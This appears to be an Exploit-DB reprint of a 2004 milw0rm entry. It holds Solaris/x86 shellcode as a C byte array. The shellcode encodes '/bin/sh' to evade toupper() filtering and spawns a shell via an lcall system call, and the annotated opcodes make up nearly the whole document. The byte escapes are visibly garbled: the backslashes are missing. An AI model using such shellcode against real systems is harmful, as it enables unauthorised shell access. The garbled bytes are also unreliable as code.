https://www.exploit-db.com/exploits/13501

漏洞细节尚未披露

/* 
 *  Solaris/x86
 *
 *  Used for toupper() evasion (look to the linux version for an 
 *  explanation and usage example). 
 */
 
char c0de[] = 
/* main: */
"xebx33"                                /* jmp callz                */
/* start: */
"x5e"                                    /* popl %esi                */
"x8dx06"                                /* leal (%esi), %eax        */
"x29xc9"                                /* subl %ecx, %ecx          */
"x89xf3"                                /* movl %esi, %ebx          */
"x89x5ex08"                            /* movl %ebx, 0x08(%esi)    */
"xb1x07"                                /* movb $0x07, %cl          */
/* loopz: */
"x80x03x20"                            /* addb $0x20, (%ebx)       */
"x43"                                    /* incl %ebx                */
"xe0xfa"                                /* loopne loopz             */
"x93"                                    /* xchgl %eax, %ebx         */
"x29xc0"                                /* subl %eax, %eax          */
"x89x5ex0b"                            /* movl %ebx, 0x0b(%esi)    */
"x29xd2"                                /* subl %edx, %edx          */
"x88x56x19"                            /* movb %dl, 0x19(%esi)     */
"x89x56x07"                            /* movl %edx, 0x07(%esi)    */
"x89x56x0f"                            /* movl %edx, 0x0f(%esi)    */
"x89x56x14"                            /* movl %edx, 0x14(%esi)    */
"xb0x3b"                                /* movb $0x3b, %al          */
"x8dx4ex0b"                            /* leal 0x0b(%esi), %ecx    */
"x89xca"                                /* movl %ecx, %edx          */
"x52"                                    /* pushl %edx               */
"x51"                                    /* pushl %ecx               */
"x53"                                    /* pushl %ebx               */
"x50"                                    /* pushl %eax               */
"xebx18"                                /* jmp lcall                */
/* callz: */
"xe8xc8xffxffxff"                    /* call start               */

"x0fx42x49x4ex0fx53x48"            /* /bin/sh -= 0x20          */
"x01x01x01x01x02x02x02x02x03x03x03x03"
/* lcall: */
"x9ax04x04x04x04x07x04";

# milw0rm.com [2004-09-26]